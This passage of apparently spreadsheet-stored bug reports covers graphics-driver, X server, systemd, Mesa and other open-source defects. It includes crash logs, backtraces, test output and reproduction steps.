-               atombios_set_crtc_dtd_timing(crtc adjusted_mode)
-       else {
                atombios_crtc_set_timing(crtc adjusted_mode)
+       else {
+               atombios_set_crtc_dtd_timing(crtc adjusted_mode)
                if (radeon_crtc-&gt;crtc_id == 0)
                        atombios_set_crtc_dtd_timing(crtc adjusted_mode)
                radeon_legacy_atom_fixup(crtc)
and now have working TV again. I also tested turning on underscan on my DVI monitor and it still works.</t>
  </si>
  <si>
    <t>SYSTEMD-86171</t>
  </si>
  <si>
    <t>ExecStart with whitespace in path</t>
  </si>
  <si>
    <t>I have a service file with a path on ExecStart option that contains whitespaces. 
The manpage suggests to double or single quote the command. 
I have tried every possible combination but the only thing that works is when you use \x20 for each whitespace.
On errors i get either main process exited code=exited status=203/EXEC or Executable path is not absolute ignoring: ...
What does not work:
ExecStart=/PATH WITH SPACES/daemon -Param1 -Param2
ExecStart=/PATH WITH SPACES/daemon -Param1 -Param2
ExecStart=/PATH WITH SPACES/daemon -Param1 -Param2
ExecStart=/PATH WITH SPACES/daemon -Param1 -Param2
ExecStart=/PATH WITH SPACES/daemon -Param1 -Param2
ExecStart=/PATH\ WITH\ SPACES/daemon -Param1 -Param2
What does work:
ExecStart=/PATH\x20WITH\x20SPACES/daemon -Param1 -Param2</t>
  </si>
  <si>
    <t>DRI-69130</t>
  </si>
  <si>
    <t>[Baytrail-M]I-G-T/kms_flip subtestï¼š'flip_rcs-flip-vs-panning' fail</t>
  </si>
  <si>
    <t>System Environment:
--------------------------------------------
Kernel: (drm-intel-nightly)beedb840c7f9a765eca6572f26b7aa4b5dfd086a
Merge: 55d2bd4 86a7e12
Author: Daniel Vetter 
Date:   Fri Sep 6 23:27:53 2013 +0200
Our baytrail platform:
00:00.0 Host bridge [0600]: Intel Corporation ValleyView SSA-CUnit [8086:0f00] 
00:02.0 VGA compatible controller [0300]: Intel Corporation ValleyView Gen7 [8086:0f31] 
Bug Details:
--------------------------------------------
Few of I-G-T/kmx_flip subcasess fail on our baytrail platform. These failure subtests include rcs-flip-vs-panningrcs-flip-vs-modeset-interruptiblercs-flip-vs-modesetrcs-flip-vs-dpmsrcs-flip-vs-panning-interruptiblercs-flip-vs-dpms-interruptible.
Here I attach the output while running rcs-flip-vs-panning: 
-----------------------------------
[root@x-byt01 tests]# ./kms_flip --run-subtest rcs-flip-vs-panning
Using monotonic timestamps
Beginning rcs-flip-vs-panning on crtc 3 connector 16
  1920x1080 60 1920 1966 1996 2080 1080 1082 1086 1112 0xa 0x48 138780
..
rcs-flip-vs-panning on crtc 3 connector 16: PASSED
Beginning rcs-flip-vs-panning on crtc 6 connector 16
  1920x1080 60 1920 1966 1996 2080 1080 1082 1086 1112 0xa 0x48 138780
.
rcs-flip-vs-panning on crtc 6 connector 16: PASSED
Beginning rcs-flip-vs-panning on crtc 3 connector 9
  1024x768 60 1024 1048 1184 1344 768 771 777 806 0xa 0x40 65000
select timed out or error (ret 0)
Subtest rcs-flip-vs-panning: FAIL
-------------------------------------
I also attached system boot dmesg and rcs-flip-vs-panning running dmesg maybe it will be helpful.</t>
  </si>
  <si>
    <t>DRI-101359</t>
  </si>
  <si>
    <t>[DP] [SKL] Desktop freeze when connected to external display on login</t>
  </si>
  <si>
    <t>Created attachment 131820
dmesg output
Description of problem:
3 out of 5 times if my laptop (T460p) is connected to external display via display port and I reboot the machine then after login screen the desktop is completely frozen. Also while the desktop/display is frozen - I am able to SSH to the machine remotely and do my stuff. I have gathered journalctl and dmesg logs via remote SSH when this happened. 
My laptop (Thinkpad T460p) although has Nvidia card - I have noveou module blacklisted and I always use integrated intel graphics.  My external display is a AOC 4K monitor connected via display port.
Version-Release number of selected component (if applicable):
Linux pern 4.11.3-200.fc25.x86_64 #1 SMP Thu May 25 19:03:07 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
How reproducible:
Steps to Reproduce:
1. Connect the laptop to an external display via display port.
2. Reboot the laptop.
3. Enter username &amp; password at login screen and watch the desktop freeze.
Actual results:
Desktop is frozen
Expected results:
Desktop should not be frozen.</t>
  </si>
  <si>
    <t>ram.manohar</t>
  </si>
  <si>
    <t>DRI-107154</t>
  </si>
  <si>
    <t>[drm] GPU recovery disabled.</t>
  </si>
  <si>
    <t>Hi!
This is a surprisingly long standing problem with a RX 460 more precisely since 4.15 all the way up to 4.18 AMD staging DRM next [1]. 
After resuming from sleep (echo -n mem &gt; /sys/power/state) amdgpu is dead (always reliably).
Here's what dmesg has to say about it:
[Sun Jul  8 11:01:17 2018] PM: suspend exit
[Sun Jul  8 11:01:19 2018] [drm:gfx_v8_0_ring_test_ib [amdgpu]] *ERROR* amdgpu: IB test timed out.
[Sun Jul  8 11:01:19 2018] [drm:amdgpu_ib_ring_tests [amdgpu]] *ERROR* amdgpu: failed testing IB on GFX ring (-110).
[Sun Jul  8 11:01:19 2018] [drm:process_one_work] *ERROR* ib ring test failed (-110).
[Sun Jul  8 11:01:28 2018] [drm:amdgpu_job_timedout [amdgpu]] *ERROR* ring gfx timeout last signaled seq=864 last emitted seq=868
[Sun Jul  8 11:01:28 2018] [drm] GPU recovery disabled.
From ealier versions:
[   42.802559] PM: suspend exit
[   42.824332] amdgpu 0000:41:00.0: GPU fault detected: 147 0x0bd84802
[   42.824338] amdgpu 0000:41:00.0:   VM_CONTEXT1_PROTECTION_FAULT_ADDR   0x0034F97B
[   42.824341] amdgpu 0000:41:00.0:   VM_CONTEXT1_PROTECTION_FAULT_STATUS 0x0C048002
[   42.824345] amdgpu 0000:41:00.0: VM fault (0x02 vmid 6) at page 3471739 read from 'TC0' (0x54433000) (72)
[   52.956306] [drm:amdgpu_job_timedout [amdgpu]] *ERROR* ring gfx timeout last signaled seq=1287 last emitted seq=1289
[   52.956316] [drm] IP block:gfx_v8_0 is hung!
[   52.956362] [drm] GPU recovery disabled.
I've also seen fault 146 but other than that it mostly looks the same. 4.14-lts (with dc=0) works fine.
RX 460 Zenith Extreme 1950x.
[1] arch linux AUR this versioning is a bit confusing it may actually already be the 4.19 branch latest commit is3838e387fd1eb17bfcf6ff7d443d931adb5cb41b</t>
  </si>
  <si>
    <t>XORG-3325</t>
  </si>
  <si>
    <t>Change in checking modes against monitor ranges</t>
  </si>
  <si>
    <t>The Patch that's going to be attached solves 3 problems:
1. It avoids segfaults if the number of user supplied monitor ranges exceed the  
   number of preallocated slots. We should really make this dynamic - but I 
   don't think this ever caused a problem so it's more or less academic.
2. It avoids that *SyncStart starts before *BlankStart. If *BlankStart &gt; 
   *SyncStart it is made = *SyncStart and its width is made maximal but such 
   that the blank does not exceed *Total. Since the Sync width has the same 
   restrictions as the Blank width monitors should still be able to clamp after 
   the sync pulse.
3. Over time mode validation has become inconsistent when people started to add 
   additional features to the mode validation. One such feature is that the 
   mode-&gt;Crtc* values have been (ab)used to allow the driver ValidMode function
   to pass driver normalized timing values back to the validation function.
   The introduction of these features made the code less readable and created 
   numerous possibly unintended side effects in the validation semantics.
   I've attempted to consolidate these changes making the code more consistent
   and eliminating a number of side effects.
   This should not cause problems for the majority of drivers still it should  
   receive testing - especially with ATi Mach64 and Radeon code.</t>
  </si>
  <si>
    <t>XCB-95494</t>
  </si>
  <si>
    <t>xcb-proto-1.12 fails tests</t>
  </si>
  <si>
    <t>[...]
make -j3 check
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/bigreq.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/composite.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/damage.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/dpms.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/dri2.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/dri3.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/ge.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/glx.xml:668: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( pad field list fd ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/glx.xml:684: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( pad field list fd ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/glx.xml:771: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( pad field list fd ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/glx.xml:959: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( pad field list fd ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/glx.xml fails to validate
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/present.xml:91: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( pad field list fd exprfield switch reply doc ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/present.xml:111: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( pad field list fd exprfield switch reply doc ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/present.xml:162: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( pad field list fd doc ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/present.xml:182: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( pad field list fd doc ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/present.xml fails to validate
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/randr.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/record.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/render.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/res.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/screensaver.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/shape.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/shm.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/sync.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xc_misc.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xevie.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xf86dri.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xf86vidmode.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xfixes.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xinerama.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xinput.xml:176: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( bitcase case pad field list fd ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xinput.xml:946: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( bitcase case pad field list fd ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xinput.xml:1734: element required_start_align: Schemas validity error : Element 'required_start_align': This element is not expected. Expected is one of ( bitcase case pad field list fd ).
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xinput.xml fails to validate
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xkb.xml:1359: element pad: Schemas validity error : Element 'pad' attribute 'serialize': The attribute 'serialize' is not allowed.
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xkb.xml:1375: element pad: Schemas validity error : Element 'pad' attribute 'serialize': The attribute 'serialize' is not allowed.
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xkb.xml:1382: element pad: Schemas validity error : Element 'pad' attribute 'serialize': The attribute 'serialize' is not allowed.
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xkb.xml:1389: element pad: Schemas validity error : Element 'pad' attribute 'serialize': The attribute 'serialize' is not allowed.
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xkb.xml:1673: element pad: Schemas validity error : Element 'pad' attribute 'serialize': The attribute 'serialize' is not allowed.
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xkb.xml fails to validate
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xprint.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xproto.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xselinux.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xtest.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xv.xml validates
/var/tmp/paludis/build/x11-proto-xcb-proto-1.12/work/xcb-proto-1.12/src/xvmc.xml validates
make[2]: *** [check-local] Error 3
make[1]: *** [check-am] Error 2
make: *** [check-recursive] Error 1
[...]
The previous version xcb-proto-1.11 builds and runs the tests/validates fine.</t>
  </si>
  <si>
    <t>timo.gurr</t>
  </si>
  <si>
    <t>MESA-89387</t>
  </si>
  <si>
    <t>Double delete in lp_bld_misc.cpp</t>
  </si>
  <si>
    <t>I have been asked in bug #86958 to open a separate bug about the resolution of the compilation error reported there where mesa is compiled against llvm&gt;=3.6.
To fix that compilation error at line 504 of file lp_bld_misc.cpp the ShaderMemoryManager* object MM is passed to a unique_ptr object which takes ownership of MM.  However in the event of the call to EngineBuilder::create() at line 523 failing at line 530 delete is called manually on MM thus leading to a possible double delete (since the destructor of the unique_ptr object having ownership will also attempt to delete MM).
This may beg the question of what EngineBuilder::setMCJITMemoryManager(ShaderMemoryManager*) does in llvm &lt; 3.6.  If that method also tries to delete its argument when finished with you would get a double delete in the error case (ie where EngineBuilder::create() fails) for earlier versions of llvm also.  However whatever the answer to that the fix for bug 86958 is on the fact of it wrong.</t>
  </si>
  <si>
    <t>vine35792468</t>
  </si>
  <si>
    <t>MESA-10597</t>
  </si>
  <si>
    <t>Update mesa to support an optimised software version for ps3</t>
  </si>
  <si>
    <t>please contact me on ch.onillon@wanadoo.fr.
Based in Angers
Best Regards 
Christophe Onillon.
2nd step : create a NVIDIA based version for accelerated opengl platform</t>
  </si>
  <si>
    <t>christophe.onillon</t>
  </si>
  <si>
    <t>FONTCONFIG-40452</t>
  </si>
  <si>
    <t>fc-match</t>
  </si>
  <si>
    <t>Running 'fc-match --all' core dumps when no fonts are installed</t>
  </si>
  <si>
    <t>Running 'fc-match --all' core dumps when no fonts are installed. FcFontSort interface returns Null when no fonts are installed. Put a check for Null condition at fc-match
Steps to reproduce with solaris :
1) Install system without fonts (server install) or boot to terminal in LiveCD install with sol-11-dev-167-text-x86.iso
2) Boot image in text mode
3) Select language Default 3 English
4) Select Shell at installation menu
5)fc-match --all 
It will core dump</t>
  </si>
  <si>
    <t>arvind.umrao</t>
  </si>
  <si>
    <t>DRI-97593</t>
  </si>
  <si>
    <t>[amdgpu SI] low performace low (about 1/4) VRAM usage</t>
  </si>
  <si>
    <t>Created attachment 126201
screenshot from unigine-heaven
Hi I've tried amdgpu driver for SI and GL apps run much slower than for radeon.
Unigine-Heaven drops from 20 fps to 8 fps
VRAM usage ~ 200MB
requested VRAM ~500MB
GTT usage ~ 500MB 
Look at the screenshot for more.
drm-next-4.9-wip: 48fad3aff638c7bc16656e31047f689aa44020a1 
xorg-git
mesa-git:98f734e
llvm-svn:280612
libdrm:4462303 + 2 patches for SI support from amd-gfx's list
I used unigine-heaven benchmark for first shot but more apps in affected:
Alien Isolation
Shadow of Mordor
Bioshock Infinite
Metro 2033 Redux
XCOM
The Witcher 2
xonotic (for quality low performance is normal) 
In fact only glxgears lightsmark gputest(all)openarena are not affected :) 
In any case VRAM-usage isn't raised over a 250MB but dmesg &amp; xorg logs are different for each games I will try update the logs later.
I've tested it with dpm=1 but dpm=0 makes nothing.</t>
  </si>
  <si>
    <t>TELEPATHY-50009</t>
  </si>
  <si>
    <t>Empathy will not connect to Gtalk after a resume from suspend</t>
  </si>
  <si>
    <t>Created attachment 61720
debug  log
Empathy will not connect to Gtalk after a resume from suspend. I've waited several minutes after resuming and it just sits there. The only way to get it to reconnect is to either restart Empathy or force a manual reconnection with Edit -&gt; Accounts -&gt; toggle the Gtalk connection.
ProblemType: Bug
DistroRelease: Ubuntu 12.04
Package: empathy 3.4.1-0ubuntu1
ProcVersionSignature: Ubuntu 3.2.0-24.37-generic-pae 3.2.14
Uname: Linux 3.2.0-24-generic-pae i686
NonfreeKernelModules: nvidia</t>
  </si>
  <si>
    <t>s9iper1</t>
  </si>
  <si>
    <t>XORG-15936</t>
  </si>
  <si>
    <t>[mpx branch] Mouse grab crashes X: Bad valuators reported</t>
  </si>
  <si>
    <t>This bug affects the mpx branch and I've verified that it does not occur in the
master branch.
If I open dosbox and hit ctrl-F10 it grabs the cursor so that the mouse controls the DOS program. If I do this on the mpx branch X crashes and the log contains the following:
[mi] Unknown event type cannot change id.
Fatal server error:
Bad valuators reported for device ImPS/2 Logitech Wheel Mouse
That device is the touchpad on my laptop. This crash happens even with only one core pointer.
Another program that triggers the same crash is Planet Penguin Racer. There it happens once I start a race. When it crashes from ppracer the 'unknown event type' message is repeated in the log about a hundred times before the crash. I believe that message is being spewed out while I am navigating the menus before I start a race. I'll attach a log file of this.</t>
  </si>
  <si>
    <t>MESA-85508</t>
  </si>
  <si>
    <t>spec/ARB_fragment_program/fp-long-alu: Crash in src/gallium/drivers/radeon/radeon_setup_tgsi_llvm.c:1153</t>
  </si>
  <si>
    <t>Created attachment 108500
GDB backtrace and register dump of the crash
While running Piglit quick on a R9 290 (see below for the full stack) I encountered a crash in src/gallium/drivers/radeon/radeon_setup_tgsi_llvm.c on line 1153 in the emit_immediate function triggered by running spec/ARB_fragment_program/fp-long-alu. The attached file contains a full backtrace and a register dump. Let me know if you need something else.
This might be a duplicate of bug 82477 (or at least caused by that) but since the crash happend somewhere else I filed my own report.
My current stack is (Debian testing as a base):
GPU: Hawaii PRO [Radeon R9 290] (ChipID = 0x67b1)
Mesa: Git:master/1a170980a0
libdrm: Git:master/00847fa48b
LLVM: SVN:trunk/r220648 (3.6 devel)
X.Org: 2:1.16.1-1
Linux: Git:git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git:v3.18-rc1 + attachment 107451 and attachment 107544
Firmware: 
&gt; 9e05820da42549ce9c89d147cf1f8e19  /lib/firmware/updates/3.17.0-citadel/radeon/hawaii_ce.bin
&gt; c8bab593090fc54f239c8d7596c8d846  /lib/firmware/updates/3.17.0-citadel/radeon/hawaii_mc.bin
&gt; 3618dbb955d8a84970e262bb2e6d2a16  /lib/firmware/updates/3.17.0-citadel/radeon/hawaii_me.bin
&gt; c000b0fc9ff6582145f66504b0ec9597  /lib/firmware/updates/3.17.0-citadel/radeon/hawaii_mec.bin
&gt; 0643ad24b3beff2214cce533e094c1b7  /lib/firmware/updates/3.17.0-citadel/radeon/hawaii_pfp.bin
&gt; ba6054b7d78184a74602fd81607e1386  /lib/firmware/updates/3.17.0-citadel/radeon/hawaii_rlc.bin
&gt; 11288f635737331b69de9ee82fe04898  /lib/firmware/updates/3.17.0-citadel/radeon/hawaii_sdma.bin
&gt; 284429675a5560e0fad42aa982965fc2  /lib/firmware/updates/3.17.0-citadel/radeon/hawaii_smc.bin
libclc: Git:master/7f6f5bff1f
DDX: 1:7.5.0-1</t>
  </si>
  <si>
    <t>AVAHI-4970</t>
  </si>
  <si>
    <t>libavahi-core</t>
  </si>
  <si>
    <t>avahi-discover does not have a window icon</t>
  </si>
  <si>
    <t>Can be simply fixed by adding the following line as the first line of main:
gtk.window_set_default_icon_name(gnome-networktool)</t>
  </si>
  <si>
    <t>DRI-3609</t>
  </si>
  <si>
    <t>via drm module not always works with 2.6.12 kernel</t>
  </si>
  <si>
    <t>In many (not all) cases module has been found not to work properly with 2.6.12
kernel producing output:
------------[ cut here ]------------
kernel BUG at include/linux/dcache.h:294!
invalid operand: 0000 [#1]
PREEMPT
Modules linked in: via drm nsc_ircc snd_pcm_oss snd_mixer_oss snd_seq_oss
snd_seq_midi_event snd_seq parport_pc parport psmouse pcspkr snd_via82xx
gameport snd_ac97_codec snd_pcm snd_timer snd_page_alloc snd_mpu401_uart
snd_rawmidi snd_seq_device snd via_ircc irda acerhk amd64_agp agpgart eth1394
sata_via sata_svw libata sbp2 ohci1394 ieee1394 usb_storage usbhid
CPU:    0
EIP:    0060:[]    Not tainted VLI
EFLAGS: 00213246   (2.6.12-gentoo)
EIP is at sysfs_remove_dir+0xfc/0x110
eax: 00000000   ebx: db5aaf30   ecx: ffffffff   edx: ddf6f280
esi: db5aa800   edi: db891d14   ebp: dc5c16c0   esp: dac0de94
ds: 007b   es: 007b   ss: 0068
Process X (pid: 12235 threadinfo=dac0c000 task=db1835a0)
Stack: dc62c9c0 dce3783a c04faea0 db5aaf30 db5aa800 dc62c940 dc5c16c0 c0300670
       db5aaf30 db5aaf30 c03006a0 db5aaf30 00000002 dc62cb20 df03d72d db5aaf30
       dbb71380 df03e3a8 ffffffff 00203282 00000000 dac0c000 db5aa800 ddf64c80
Call Trace:
[] kobject_del+0x10/0x20
[] kobject_unregister+0x20/0x30
[] drm_takedown+0x34d/0x3f0 [drm]
[] drm_fasync+0x48/0x90 [drm]
[] drm_release+0x3d5/0x540 [drm]
[] drm_version+0x0/0xa0 [drm]
[] drm_ioctl+0x1c3/0x23c [drm]
[] udf_create+0x30/0x1b0
[] drm_version+0x0/0xa0 [drm]
[] udf_create+0x30/0x1b0
[] do_ioctl+0x77/0xb0
[] __fput+0x16a/0x1b0
[] filp_close+0x52/0xa0
[] sys_close+0x58/0xa0
[] sysenter_past_esp+0x54/0x75
Code: 89 44 24 08 8b 00 89 04 24 e8 c1 a9 fa ff 8b 54 24 08 8b 42 04 89 04 24 e8
32 35 16 00 8b 44 24 08 89 04 24 e8 a6 a9 fa ff eb 93  0b 26 01 a2 94 49 c0
e9 17 ff ff ff 8d b4 26 00 00 00 00 83
In most cases where error occures X does not start in my case on Xorg exit i
get blank screen when looking at dmesg through ssh i se the above.
My configuration:
Linux gentoo
Acer Aspire 1362 laptop k8n800 chipset (using snapshot unichrome driver from
http://myth.ivor.org  cvs drm module from dri cvs) kernel 2.6.12 (with 2.6.11
it worked fine gentoo-sources) Xorg 6.8.2 (6.8.2-r2 ebuild). AMD Mobile
Sempron 2800+.
On request I can send my kernel configuration.</t>
  </si>
  <si>
    <t>LIBREOFFICE-33151</t>
  </si>
  <si>
    <t>Danish and Hungarian help content from extensions used in other help localizations</t>
  </si>
  <si>
    <t>Created attachment 42073
Pls. see original report
I saw that in LibreOffice 3.3.0 RC3 - WIN7  Home Premium (64bit) English UI  [OOO330m19 (build 5 / tag 3.3.0.3)] same with German UI.
I can't remember to have seen that in RC2see this very visible problem as a 3.3 blocker</t>
  </si>
  <si>
    <t>timar</t>
  </si>
  <si>
    <t>LIBOIL-5822</t>
  </si>
  <si>
    <t>oil_profile_stamp on s390 uses wrong asm constraint</t>
  </si>
  <si>
    <t>=m is not the appropriate constraint for s390 STCK but =Q is.</t>
  </si>
  <si>
    <t>rguenth</t>
  </si>
  <si>
    <t>TELEPATHY-41697</t>
  </si>
  <si>
    <t>crash in _tp_contacts_from_values</t>
  </si>
  <si>
    <t>Original bug report: https://bugzilla.gnome.org/show_bug.cgi?id=661158
#0  0x00007f4961df4735 in raise () from /lib/libc.so.6
#1  0x00007f4961df5bab in abort () from /lib/libc.so.6
#2  0x00007f49623890c2 in g_assertion_message (domain= file=0x7f496a19040a util.c line= 
    func=0x7f496a19bc80 _tp_contacts_from_values message=) at gtestutils.c:1425
#3  0x00007f4962389607 in g_assertion_message_expr (domain=0x7f496a16c0c2 tp-glib file=0x7f496a19040a util.c line=1961 
    func=0x7f496a19bc80 _tp_contacts_from_values expr=) at gtestutils.c:1436
#4  0x00007f496a1558be in _tp_contacts_from_values (table=) at util.c:1961
#5  0x00007f496a0c6d9b in _tp_channel_contacts_handle_owners_changed (self=0x2ab4250 added=0x2ac9800 removed=0x2a23020 
    identifiers=0x2ac9860) at channel-contacts.c:722
#6  0x00007f496a0c8352 in tp_channel_handle_owners_changed_detailed_cb (self=0x2ab4250 added=0x2ac9800 removed=0x2a23020 
    identifiers=0x2ac9860 user_data= weak_object=) at channel-group.c:1247
#7  0x00007f496a0a77ae in _tp_cli_channel_interface_group_invoke_callback_for_handle_owners_changed_detailed (tpproxy=0x2ab4250 
    error= args=0x2aea320 generic_callback=0x7f496a0c8312  user_data=0x0 
    weak_object=0x0) at _gen/tp-cli-channel-body.h:2773
#8  0x00007f496a149808 in tp_proxy_signal_invocation_run (p=0x2a6cd60) at proxy-signals.c:266
#9  0x00007f4962364fe1 in g_idle_dispatch (source= callback= user_data=) at gmain.c:4801
#10 0x00007f4962368f8c in g_main_dispatch (context=0x1489f90) at gmain.c:2441
#11 g_main_context_dispatch (context=0x1489f90) at gmain.c:3011
#12 0x00007f496236954b in g_main_context_iterate (context=0x1489f90 block= dispatch=1 self=) at gmain.c:3089
#13 0x00007f4962369b02 in g_main_loop_run (loop=0x26f0af0) at gmain.c:3297
#14 0x00007f496656f7ed in gtk_main () from /usr/lib/libgtk-3.so.0
#15 0x00007f496361282e in g_application_run (application=0x15859a0 argc=1 argv=0x7fff84007608) at gapplication.c:1323
#16 0x0000000000457fff in main (argc=1 argv=0x7fff84007608) at empathy.c:838</t>
  </si>
  <si>
    <t>XORG-16494</t>
  </si>
  <si>
    <t>system hang on closing T60 panel lid when in dual screen mode (with kernel 2.6.26-rc7)</t>
  </si>
  <si>
    <t>Created attachment 17346
output of lspci -vnn
Latest working kernel version: 2.6.25
Earliest failing kernel version: ? 2.6.26~rc5 (previous RCs not tested).
Distribution: Debian/testing
Hardware Environment: Thinkpad T60 (Intel video chipset)
Software Environment: 
  Debian's xserver-xorg              1:7.3+10 
  Debian's xserver-xorg-video-intel  2:2.3.2-1
  Kernel from http://kernel-archive.buildserver.net/debian-kernel/ 
Problem Description:
 If I close my laptop's panel when I have an external monitor 
 attached and enabled my laptop freeze... i have to power it off.
Steps to reproduce:
Plug an external screen to a Thinkpad T60 laptop (based on intel chipset).
Then boot the laptop and log into gnome. Make sure that :
1. Both screen are enabled (xrandr --auto).
2. Gnome power setting has : When laptop lid is closed = Blank Screen
3. Close the laptop's panel.
=&gt; The laptop is now frozen.
It occurs when : using linux-image-2.6.26-rc5 rc6 or rc7.
Does not occurs with : linux-image-2.6.24  2.6.25 from Debian/testing.
Occurs if gnome has When laptop lid is closed = Blank Screen
Doesn't occur if it's set to Do nothing
Occurs on my T60 with :
  Intel 945GM/PM/GMS Express Memory Controller Hub [8086:27a0]
  Intel 945GM/GMS Express Integrated Graphics Controller [8086:27a2] 
Does NOT occur on a T61 with 
  Intel GM965/GL960 Integrated Graphics Controller [8086:2a02]
  Intel GM965/GL960 Integrated Graphics Controller [8086:2a03]
Occurs when both output are enable (ï»¿crt=on + lvds=on)
Doen not occurs when only one of the screens are enabled (crt=on + lvds=off OR
ï»¿crt=off + lvds=on).
Note :
The laptop can suspend or hibernate then resumes correctly.
Running gnome screensaver is ok (but gnome doesn't seems to want
to put the screens in powersave mode).
++++
As requested by Linux kernel maintainers I've tried to enable ForceEnablePipeA which works.
I've attached lspci as requested.
thanks
Franklin
----
see also:
 http://bugzilla.kernel.org/show_bug.cgi?id=10965#c4 
 http://bugs.debian.org/487672</t>
  </si>
  <si>
    <t>fpiat</t>
  </si>
  <si>
    <t>DRI-98928</t>
  </si>
  <si>
    <t>[BXT] Mipi Screen remains blank after resuming from S3</t>
  </si>
  <si>
    <t>Description:
=============================================
Mipi Screen remains blank after resuming from S3 state.
Steps to reproduce:
=============================================
Boot a BXT platform with MIPI panel go to S3
#echo mem &gt; /sys/power/state
Resume from S3 state by any method (keystrokeclickpower buttonetc)
Expected Result:
============================================
System resumes fine without any issue
Actual result:
============================================
MIPI screen remains blank after resuming from S3
HW Configuration:
==============================================
Platform : BXT-P
Motherboard model : BroxtonP
Motherboard type : NOTEBOOK Hand Held
Motherboard manufacturer : IntelCorp.
CPU family : Other
CPU information : 06/5c
GPU Card : Intel Corporation Device 5a84 (rev 0a) (prog-if 00 [VGA controller])
Screen	: AUO 10.1 1920x1200 Non-Touch MIPI Kit - B101UAN01.7
SW Configuration:
===============================================
Kernel
commit d6149d212b69a8e1d9229fe80fca034a0abe1d0e
Author: Mika Kuoppala 
Date: Mon Nov 21 14:48:58 2016 +0200
drm-intel-nightly: 2016y-11m-21d-12h-48m-13s UTC integration manifest
Component : drm
tag : libdrm-2.4.73-9-g1924b67
commit : 1924b67 
Component : mesa
